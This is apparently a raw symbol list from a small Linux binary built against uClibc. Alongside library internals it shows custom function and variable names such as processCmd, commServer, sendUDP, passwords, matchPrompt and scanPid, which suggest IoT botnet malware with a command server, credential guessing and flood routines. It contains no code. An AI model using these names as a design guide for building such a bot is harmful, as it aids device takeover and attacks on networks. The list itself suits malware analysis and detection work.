__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
__stdio_adjust_position
__GI_poll
_vfprintf_internal
fork
__stdio_rfill
strncat
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
_store_inttype
__length_dotted
__GI_random
__uclibc_progname
__GI_getegid
__GI_wait4
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
UserAgents
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
inet_ntoa
sendUDP
tcgetattr
__C_ctype_tolower_data
time
__GI_abort
poll
fdpopen
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
strcmp
__nameserver
data_start
__h_errno_location
__GI_putc_unlocked
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__malloc_sbrk_lock
sprintf
fdgets
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
commServer
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
__atexit_lock
scanPid
rand_cmwc
__libc_fcntl64
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
__heap_alloc
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
_errno
atoi
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fputc_unlocked
readUntil
fcntl
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
mainCommSock
pids
vfprintf
strpbrk
getBogos
_load_inttype
raise
free
sigprocmask
__fputc_unlocked
getsockname
